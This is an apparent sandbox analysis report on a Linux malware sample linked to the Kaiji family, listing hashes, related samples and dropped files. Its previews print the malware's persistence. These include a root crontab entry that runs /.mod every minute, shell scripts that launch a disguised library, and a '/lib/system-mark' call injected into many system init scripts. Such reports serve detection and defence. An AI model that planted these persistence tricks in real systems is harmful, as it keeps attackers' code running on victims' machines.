	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	108.156.211.71
	Reminder - you have been asked to complete a Mitek ID confirmation.eml	Get hash	malicious	Unknown	Browse	34.251.127.43
	czxw4iVMHJ.exe	Get hash	malicious	Stealc, Vidar	Browse	18.245.124.39
	JHPvqMzKbz.exe	Get hash	malicious	Vidar	Browse	108.139.47.92
	https://www.blockchain.com/explorer	Get hash	malicious	Xmrig	Browse	18.239.69.58
	Payment slip.vbs	Get hash	malicious	Unknown	Browse	185.166.143.50

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/.mod	linux_arm5.elf	Get hash	malicious	Kaiji	Browse
	linux_aarch64.elf	Get hash	malicious	Kaiji	Browse
	linux_amd64.elf	Get hash	malicious	Kaiji	Browse
	linux_arm7.elf	Get hash	malicious	Kaiji	Browse
	linux_arm6.elf	Get hash	malicious	Kaiji	Browse
	DerI9qwTwK.elf	Get hash	malicious	Kaiji	Browse
	wqX9qtzKkX.elf	Get hash	malicious	Kaiji	Browse
	QHoi0jjr6w.elf	Get hash	malicious	Kaiji	Browse
	YuOs10eAlB.elf	Get hash	malicious	Kaiji	Browse
	kJSH0hpzUR.elf	Get hash	malicious	Kaiji	Browse
/etc/32676	linux_arm5.elf	Get hash	malicious	Kaiji	Browse
	linux_aarch64.elf	Get hash	malicious	Kaiji	Browse
	linux_amd64.elf	Get hash	malicious	Kaiji	Browse
	linux_arm7.elf	Get hash	malicious	Kaiji	Browse
	linux_arm6.elf	Get hash	malicious	Kaiji	Browse
	DerI9qwTwK.elf	Get hash	malicious	Kaiji	Browse
	p2GrGlDHjw.elf	Get hash	malicious	Kaiji	Browse
	mJWouOfZLy.elf	Get hash	malicious	Kaiji	Browse
	OUcCqCsimA.elf	Get hash	malicious	Kaiji	Browse
	ZcDEk7Z0aN.elf	Get hash	malicious	Kaiji	Browse

Created / dropped Files

/.mod

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.9931325576478587
Encrypted:	false
SSDEEP:	3:TKH/LQP5o:8M2
MD5:	FF0DB01AA3465358D28FD34FE8479236
SHA1:	DBE00D4EAD9F9FE3D8B97CBDCA1F2EFD5EF86EEF
SHA-256:	BF659AA5C483CF60E1E7626EEC9FAE7AE182CC611A3F42B2521F8A8C018C7195
SHA-512:	F414CE5B5A10DD25EA22CA123473604445411E056F4310DFE1C09AECE6B16CB5AD8B989070201594025A6DBE319FE87A871E63209E977EE185EF302689F048B2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: linux_arm5.elf, Detection: malicious, Browse Filename: linux_aarch64.elf, Detection: malicious, Browse Filename: linux_amd64.elf, Detection: malicious, Browse Filename: linux_arm7.elf, Detection: malicious, Browse Filename: linux_arm6.elf, Detection: malicious, Browse Filename: DerI9qwTwK.elf, Detection: malicious, Browse Filename: wqX9qtzKkX.elf, Detection: malicious, Browse Filename: QHoi0jjr6w.elf, Detection: malicious, Browse Filename: YuOs10eAlB.elf, Detection: malicious, Browse Filename: kJSH0hpzUR.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/bash./usr/lib/libgdi.so.0.8.1

/etc/.walk

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	147
Entropy (8bit):	3.90505960815819
Encrypted:	false
SSDEEP:	3:3Rk4WtwyIRLwBvfWB4WtwyIRLwBvfq2TLQdHjhOdQBHXWcMn:hRtAvfWqtAvfq2MdHjcy3Wxn
MD5:	3CFE3CC5EFC716E079DF1B755A65E81C
SHA1:	3356A0E971078D460AFF811018094BED0CFBE397
SHA-256:	37100D87A850F7F695D0216D38CCC3CF64EA41A89E14F844DBF254FAC10589A9
SHA-512:	CA060312D2993A7E0B42516DEF5C734915BA64231A5A7D7B6A1584D7C26A5EE9CE9CA9D9D8EE7E6E538CC285DAD864EDB4E61837B1C0D815057BB0D3DDDD9599
Malicious:	false
Reputation:	low
Preview:	e74ed74ec65f017ed1638a49c1350a23fc63f217dc3c797a.e74ed74ec65f017ed1638a49c1350a23fc63f217dc3c797a.e464ed5cf25f2831d065cf4dc1350d7ee85d8a5fc939277a.

/etc/32676

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	63
Entropy (8bit):	4.619727741986734
Encrypted:	false
SSDEEP:	3:TKH/zOsUF4K0WJTD0HXD:LsUF4kDYXD
MD5:	6CB66DDA6E7B14F42654921B3EC25226
SHA1:	B39354C512D130E1C52E9163DC12C4D5704A60A7
SHA-256:	45A2B263B893B33C703B7E5F64F04DE776D1DC9578BE65C5047195CD531FEF2A
SHA-512:	91A32A8C6B9490CB31CDB79C2E8697DAF1637C63136658B46037D60ED47D2B6D685F62D526E87960BAF93C6875295CF0C892EDAF65B34CBEB00D9961FEE7938B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: linux_arm5.elf, Detection: malicious, Browse Filename: linux_aarch64.elf, Detection: malicious, Browse Filename: linux_amd64.elf, Detection: malicious, Browse Filename: linux_arm7.elf, Detection: malicious, Browse Filename: linux_arm6.elf, Detection: malicious, Browse Filename: DerI9qwTwK.elf, Detection: malicious, Browse Filename: p2GrGlDHjw.elf, Detection: malicious, Browse Filename: mJWouOfZLy.elf, Detection: malicious, Browse Filename: OUcCqCsimA.elf, Detection: malicious, Browse Filename: ZcDEk7Z0aN.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/bash.while [ 1 ]; do.sleep 60./etc/opt.services.cfg.done

/etc/crontab

Download File

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	24
Entropy (8bit):	3.000961982762677
Encrypted:	false
SSDEEP:	3:HFdtKeIBFv:l6eIBV
MD5:	6B13F24B625DC5B832A4AE80CFAB7DDA
SHA1:	8D0BAF4556328F9CEFB4041D67CB6BF30570AF84
SHA-256:	AC95234D459AA020883AF0A93879C835582CB60D7DD63C68F33993BA2546661F
SHA-512:	76774BF236D5DB77B09BFD2A36F190B86AC7DA7147C635CAF06A1884E151345585803885AD1FCBD60F566A48F165CBF8B445B506047CBC0A9924BF79B4C8E289
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/1 * * * root /.mod .

/etc/init.d/acpid

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2304
Entropy (8bit):	5.099881186780916
Encrypted:	false
SSDEEP:	48:9tdVEA2+3MPMiOMdxA3Gbsbcq1himLHLHmvgjWL:9tdVEA2+3MPiI3Qbcq1Q4Hrmvt
MD5:	BD41974D1C7269BD429343943C8ED10A
SHA1:	D99E55E32229483A694B8B2EFEC8D15CF1C8FCCE
SHA-256:	56044D786BA8F4B11DDF9DBC88502ECE10246991CA383F913E9B86E57F19A28E
SHA-512:	A386FA323285EF24A9A442A5CEB8D9B2A36409B7BEC2D729031C7F83C6F3664EA1A745D35CA487A25FC953B6197F3A9FF1B35EEEFD2F90262BC2EEA7BB89D522
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: acpid.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# X-Start-Before: kdm gdm3 xdm lightdm.# X-Stop-After: kdm gdm3 xdm lightdm.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: Start the Advanced Configuration and Power Interface daemon.# Description: Provide a socket for X11, hald and others to multiplex.# kernel ACPI events..### END INIT INFO..set -e..ACPID="/usr/sbin/acpid".DEFAULTS="/etc/default/acpid"..# Check for daemon presence.[ -x "$ACPID" ] \|\| exit 0..OPTIONS="".MODULES="".# Include acpid defaults if available.[ -r "$DEFAULTS" ] && . "$DEFAULTS"..# Get lsb functions.. /lib/lsb/init-functions..# As the name says. If the kernel supports modules, it'll try to load.# the ones listed in "MODULES"..load_modules() {. [ -f /proc/modules ] \|\| return 0. if [ "$MODULES" = "all" ]; then./lib/system-mark. MODULES="$(sed -rn 's#^(/lib/mod

/etc/init.d/alsa-utils

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	5694
Entropy (8bit):	5.4204403708834565
Encrypted:	false
SSDEEP:	96:iKtDd9/iwmDaLEuE9nwsmFRzF+rc17NyppyhHk5eEkv:iCdlW6EuUnZeRB+rc15yryZkq
MD5:	14EB05544D93BC0B09262334CCB79F2C
SHA1:	620AC9E2B5A23703A568800376CE590445FDFBD5
SHA-256:	C52ED6032904A94A0B83DCD1CDFA83D48DA29D049A5F29BB90265492120183E4
SHA-512:	83DCDC085FBFEEC1843D8C5E8978162AA34F9ECD0E7BF4E8BBF8D8D005837FF6A69F56BF7988400CB5AF07A5AF63D6471BD8BC2DAE223CDA3500F07B0EE9C36B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.#.# alsa-utils initscript.#.### BEGIN INIT INFO.# Provides: alsa-utils.# Required-Start: $local_fs $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Restore and store ALSA driver settings.# Description: This script stores and restores mixer levels on.# shutdown and bootup.On sysv-rc systems: to.# disable storing of mixer levels on shutdown,.# remove /etc/rc[06].d/K50alsa-utils. To disable.# restoring of mixer levels on bootup, rename the.# "S50alsa-utils" symbolic link in /etc/rcS.d/ to.# "K50alsa-utils"..### END INIT INFO..# Don't use set -e; check exit status instead..# Exit silently if package is no longer installed.[ -x /usr/sbin/alsactl ] \|\| exit 0..PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin.MYNAME=/etc/init.d/alsa-utils.ALSACTLHOME=/run/alsa..[ -d "$ALSA

/etc/init.d/anacron

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2124
Entropy (8bit):	4.760217966755678
Encrypted:	false
SSDEEP:	24:aiF8WzzU+LuN5K6YqfOv5i1CPeFecyZR11s+M8k93ILlfWW6910kF4T0Op:7RzgTNNOhi1eAryZR1vX5fTKX00+
MD5:	B8F9EF2F7B8875CFEE672094FF6B7829
SHA1:	901405E0A0F9AF0D39010FB609E06A34FA9918F5
SHA-256:	11696FDED80A45C7CD5351D01D0C4419E69A863C3774F7F37C3FD22F22F3EE16
SHA-512:	A90371D6664E9043A8FD43A8138B245C228AFF9E64AC6A41D73C849C0CF746ABFAEABB2C1D2BEEBBC05D7451A2B84DAE4E80A0BDF64864A390FE950437CB4745
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: anacron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Run anacron jobs.# Description: The first purpose of this script is to run anacron at.# boot so that it can catch up with missed jobs. Note.# that anacron is not a daemon. It is run here just once.# and is later started by the real cron. The second.# purpose of this script is that said cron job invokes.# this script to start anacron at those subsequent times,.# to keep the logic in one place..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin..test -x /usr/sbin/anacron \|\| exit 0.test -r /etc/default/anacron && . /etc/default/anacron... /lib/lsb/init-functions..case "$1" in. start). if init_is_upstart 2>/dev/null; then./lib/system-mark. exit 1. fi. log_daemon_msg "Starting

/etc/init.d/apparmor

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3826
Entropy (8bit):	5.249219751257144
Encrypted:	false
SSDEEP:	96:RFCjnn83hjz3n1zJNSNuDNBqNPoNpMbANEF7gG9M3zRVhszRVhxRl:Wjn4hj779Gjl
MD5:	DE4607EB984BD8C2751A19FED2566718
SHA1:	B605ED61D40829230C99D2C54B401CD2E154DE20
SHA-256:	F6BC11FE360F4DB66CB6B1C7763DC087E5D8F76A7D8145F08F617FD10C4FBFFD
SHA-512:	D932550ED8287788D8E14165CB47EB3A649D40B8AE6E8EEEC6ADCCC3563D8B376BBDE5C804205BD9B174CC3786154292C2D352307F41D9649312D9BF615DFD0C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# ----------------------------------------------------------------------.# Copyright (c) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007.# NOVELL (All rights reserved).# Copyright (c) 2008, 2009 Canonical, Ltd..#.# This program is free software; you can redistribute it and/or.# modify it under the terms of version 2 of the GNU General Public.# License published by the Free Software Foundation..#.# This program is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with this program; if not, contact Novell, Inc..# ----------------------------------------------------------------------.# Authors:.# Steve Beattie <steve.beattie@canonical.com>.# Kees Cook <kees@ubuntu.com>.#.# /etc/init.d/app

/etc/init.d/apport

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3050
Entropy (8bit):	5.216428196190724
Encrypted:	false
SSDEEP:	48:jV/OxxHuoBusZABLm/tiUmZmNndBuSZWg/e/fuppzDGdxboGxz5:jV/OxNDBusZABLm1BmOnbuSZWg2/anOT
MD5:	FB82D03D336FC2AC2901C9D28682B408
SHA1:	992649B4B941B5B5372A6215DA4A5231BFDCD0BF
SHA-256:	F9AFCA8A53AF95CC19F4D1D2495F80335924F5C65ABE9147C5D46AE29CBEC76C
SHA-512:	8EE7107F9FCB458989553B871B06823646B765980D7BBF84C7110C0FFEA116DE7D141D5FE21BA2CFDBCA9A423434AE276D3949AB6EF1EACED8DEF7DFE6D16C40
Malicious:	true
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: apport.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: automatic crash report generation.### END INIT INFO..DESC="automatic crash report generation".NAME=apport.AGENT=/usr/share/apport/apport.SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$AGENT" ] \|\| exit 0..# read default file.enabled=1.[ -e /etc/default/$NAME ] && . /etc/default/$NAME \|\| true..# Define LSB log_* functions..# Depend on lsb-base (>= 3.0-6) to ensure that this file is present... /lib/lsb/init-functions..#.# Function that starts the daemon/service.#.do_start().{..# Return..# 0 if daemon has been started..# 1 if daemon was already running..# 2 if daemon could not be started...[ -e /var/crash ] \|\| mkdir -p /var/crash..chmod 1777 /var/crash...# check for kernel crash dump, convert it to apport report..if [ -e /var/crash/vmcore ] \|\| [ -n "`ls /va

/etc/init.d/avahi-daemon

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2453
Entropy (8bit):	4.851897064111941
Encrypted:	false
SSDEEP:	48:9s2V+ig+Ui83MZoJQukTS9VC2/ulMA0uv3uKv2ZsGyjyRft/zsDE7Ed:93oijU4ukTSZux0uv3uKvdJORlADHd
MD5:	84273238ABAA8A7DE2D516C95D92F171
SHA1:	875222E1EE9FE460931E5340C94F958D1DB14C9D
SHA-256:	2BDB658E48A470E440378BC4BC4CC48B9B228BC3DF759187787A7D9FD71EEC90
SHA-512:	C226B5813A17D0640FBC77D09889F19F638FF9701CCC2E933B3DC8749674BC1918FD22011096126FEBBBBF55F91BE1D78DF8CC176D4465BA4A2426414C2D1D88
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: avahi avahi-daemon.# Required-Start: $remote_fs dbus.# Required-Stop: $remote_fs dbus.# Should-Start:. $syslog.# Should-Stop: $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Avahi mDNS/DNS-SD Daemon.# Description: Zeroconf daemon for configuring your network .# automatically.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC="Avahi mDNS/DNS-SD Daemon".NAME="avahi-daemon".DAEMON="/usr/sbin/$NAME".SCRIPTNAME=/etc/init.d/$NAME..# Gracefully exit if the package has been removed..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Include avahi-daemon defaults if available..test -f /etc/default/avahi-daemon && . /etc/default/avahi-daemon..DISABLE_TAG="/var/run/avahi-daemon/disabled-for-unicast-local"..#.# Function that starts the daemon/service..#.d_start() {. $DAEMON -c && return 0.. if [ -e $DISABLE_TAG -a "$AVAHI_DAEMON_DETECT_LOCAL" !=

/etc/init.d/binfmt-support

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	5.0501124070839
Encrypted:	false
SSDEEP:	24:ai3V6yXngSBVSBNyj6edNHcBcN6ekvx2w5mw+76opC:73ZngWVWNMNH0Y6bJ2w4wrJ
MD5:	A79B82CEAEE457E62E6EA7BAF7D1CAE5
SHA1:	B1EEBF3A9994B719F88E63BAC51A40EF3E3A4082
SHA-256:	76950791A135F0DFCCBE3A246A8085304345B40AC3DFE30BF1CA53C6BF81FD95
SHA-512:	4B6A9CEAEAC8952255DA0EAED35DAB689D80D3BD2B7D69CF3BF36D36271CCA309114D3E32C6C6797143C991DF1EAEB6491A7A36DE6AF9633F71AECB4B3D40C4E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: binfmt-support.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Support for extra binary formats.# Description: Enable support for extra binary formats using the Linux.# kernel's binfmt_misc facility..### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=binfmt-support.DESC="additional executable binary formats"..if [ "$(uname)" != Linux ]; then./lib/system-mark. exit 0.fi..which update-binfmts >/dev/null 2>&1 \|\| exit 0... /lib/lsb/init-functions.[ -r /etc/default/rcS ] && . /etc/default/rcS..set -e.CODE=0..case "$1" in. start). log_daemon_msg "Enabling $DESC" "$NAME". update-binfmts --enable \|\| CODE=$?. log_end_msg $CODE. exit $CODE. ;;.. stop). log_daemon_msg "Disabling $DESC" "$NAME". update-binfmts --disable \|\| CODE=$?. log_end_msg $CODE. exi

/etc/init.d/bluetooth

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3071
Entropy (8bit):	5.403760092319036
Encrypted:	false
SSDEEP:	48:71OoPrcMbC/BUUzGrm92+kbM935LmiVQoOZoKkkFjM+Zh9YDFjMrfOte:79TcWC/BUeem92R4V5LROt5r9CE2A
MD5:	E001FF7DBF2452314EEC95D08540D7AF
SHA1:	B2B63E00B1685EAA0DACC4D5F2C07C15F0D6AE55
SHA-256:	D6AA950CFA0BA62353E3734AB3E43F1B402C1B7F95CAC3C5D99D8453D299BDF3
SHA-512:	A9EA2F92C5A94330041228C7AECEB44718EBA47017ED7A41DEC87D6EAD6D7B34F968A79CFCFDDCC38561D964D354BFB63F3F52C2EFEE76C38C80DECCEC2FA944
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: bluetooth.# Required-Start: $local_fs $syslog $remote_fs dbus.# Required-Stop: $local_fs $syslog $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Start bluetooth daemons.### END INIT INFO.#.# bluez Bluetooth subsystem starting and stopping.#.# originally from bluez's scripts/bluetooth.init.#.# Edd Dumbill <ejad@debian.org>.# LSB 3.0 compilance and enhancements by Filippo Giunchedi <filippo@debian.org>.#.# Updated for bluez 4.7 by Mario Limonciello <mario_limonciello@dell.com>.# Updated for bluez 5.5 by Nobuhiro Iwamatsu <iwamatsu@debian.org>.#.# Note: older daemons like dund pand hidd are now shipped inside the.# bluez-compat package..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC=bluetooth..DAEMON=/usr/sbin/bluetoothd.HCIATTACH=/usr/bin/hciattach..BLUETOOTH_ENABLED=0.HID2HCI_ENABLED=1.HID2HCI_UNDO=1..SDPTOOL=/usr/bin/sdptool..# If you want to be ignore error of "org.freedesktop.hostname1",.# please en

/etc/init.d/console-setup.sh

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	4.3356283043101165
Encrypted:	false
SSDEEP:	24:9lBiePItKzeBcx2o8/z3ejhTJckS5gzjdJwZWkZg7zcOqb6:93PyKzYcg/LshTJckS5gJw8kG7A9b6
MD5:	FE88F57D8990408CAAF7688C8EB6D734
SHA1:	7160510037CCA5505F40EFBE4CE8CCC777EAECE3
SHA-256:	C01D230B67C35FB75446E7A4599A09751E8859A4462CD5EB34DF9F186B28049F
SHA-512:	3DDA7EAF95F80FD3E35D8FDBF9AB77126E2CBF39CAA5C7A1275227D5267683F43504B191F0E08E901F93667AAFEE1F21F79BA3C8A27D5622C990DAA3AE39583D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: console-setup.sh.# Required-Start: $remote_fs.# Required-Stop:.# Should-Start: console-screen kbd.# Default-Start: 2 3 4 5.# Default-Stop:.# X-Interactive: true.# Short-Description: Set console font and keymap.### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system-mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system-mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {.. if [ "$1" -eq 0 ]; then./lib/system-mark.. echo done... else.. echo failed... fi. }. fi. log_action_begin_msg "Setting up console font and keymap". if /li

/etc/init.d/cron

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3111
Entropy (8bit):	4.911661386459712
Encrypted:	false
SSDEEP:	48:5PMic6MicW4dJIrcz8WD23fK2LAb38CE1ATGuMoZisTdDKoA3gHMLf:5E3s4dJWRWD23y2LgsZCTHMnidD/A3gU
MD5:	0E0A4A7372459B9C2D8F45BAA40A64B3
SHA1:	6DEAF952235F89CBDD83FBE48C89A4F048E52043
SHA-256:	2B88ED8EFDF3262040903719AA03156C8CD73B50CF2F2FCCACB33693FE4110D6
SHA-512:	4E11C50B5F5D95CAE5B374C4597DD83F79434876598BD9C5FC32D37B765885DC1FF920D96D6594E548F08DC9D367D8C74F704C9BA49056749E5A3B4CD6D13C50
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# Start/stop the cron daemon..#.### BEGIN INIT INFO.# Provides: cron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Should-Start: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Should-Stop: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Regular background program processing daemon.# Description: cron is a standard UNIX program that runs user-specified .# programs at periodic scheduled times. vixie cron adds a .# number of features to the basic UNIX cron, including better.# security and more powerful configuration options..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DESC="cron daemon".NAME=cron.DAEMON=/usr/sbin/cron.PIDFILE=/var/run/crond.pid.SCRIPTNAME=/etc/init.d/"$NAME"..test -f $DAEMON \|\| exit 0... /lib/lsb/init-functions..[ -r /etc/default/cr

/etc/init.d/cryptdisks

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	955
Entropy (8bit):	5.160229628002615
Encrypted:	false
SSDEEP:	12:aiy4BTty5r2MVOc4qVp1b7NBq2dS1uaqLgcIcrPcrmjcdpEMyuDHkkGKErIKDq7p:aiVT5MQsL1bPq2MKZcr/ZkVyKDpjQ
MD5:	3B43339B088088E5B725575549A61F55
SHA1:	98AF37D27DC1A2EFE51AD74366137D375E631BB3
SHA-256:	BF85CED45A7B48892F49D608E189307CC08330A4F2834289B847B457DFD7D28A
SHA-512:	AF7347AEE4625DBD7C23A9A411362EC940B17DBBA794E9B89DC37D893EBCB445044BDB52D21197DBCEF73C75CF697E935D729110A2125D168E82D6B5E24938FC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks.# Required-Start: checkroot cryptdisks-early.# Required-Stop: umountroot cryptdisks-early.# Should-Start: udev mdadm-raid lvm2.# Should-Stop: udev mdadm-raid lvm2.# X-Start-Before: checkfs.# X-Stop-After: umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup remaining encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system-mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="remaining".DEFAULT_LOUD="yes"..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cryptdisks-early

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	914
Entropy (8bit):	5.158660421998386
Encrypted:	false
SSDEEP:	12:aiy2BTCZN2MVW4qVS5sNBq2dX9qLgcIcrPcrmZm2dpBdMyuDHkkGKErIKDq7URuL:ai/TTMkw5Mq2CeKYZkVyKDvjQ
MD5:	905C0E1E5CC6FFC62CA21752E3F1753E
SHA1:	8810356FC23199F23631A7656815A431E34C4C1A
SHA-256:	6418AB31DBC9A1222A89C3D896C534373D9CB2D8D5D42FC75699889979E0AC34
SHA-512:	C7735CFB23C6CC924E7B55D825F352EBFB86CAEA48DF358499EF294EBE82F49F325F3C1098AA717BA622A8545E9A116C2648B44E2066597C5D4A37E71E6F77F8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks-early.# Required-Start: checkroot.# Required-Stop: umountroot.# Should-Start: udev mdadm-raid.# Should-Stop: udev mdadm-raid.# X-Start-Before: lvm2.# X-Stop-After: lvm2 umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup early encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system-mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="early".DEFAULT_LOUD=""..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks-early {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cups

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2856
Entropy (8bit):	5.2245818519394565
Encrypted:	false
SSDEEP:	48:76MLNMwmbAzAZVCoLqLVO1Z6NH/qAh1UoAaYmUoG/FVv/FkG/UoG/F1RetsJ:7BWwmEMZVChFB7UoAaZUoGDvuG/UoGr/
MD5:	A13A7862BD0038FC523BFDFD69743E21
SHA1:	02BDC079157F4E2DF13C4CD4EF92BF477512348E
SHA-256:	0B82721F8B1FA32F5D25FE373FCD6DC540296675AFAD5C04A0EA18C4855DF29D
SHA-512:	4856AEFE6C5516CD19438DAD4689B3D656BA0ACFD0E498ABDA54628E1287B2C9C340040799C5B8AE68DA67970E19B41264E0F7C0416108E53D6477F5F18C7AC9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
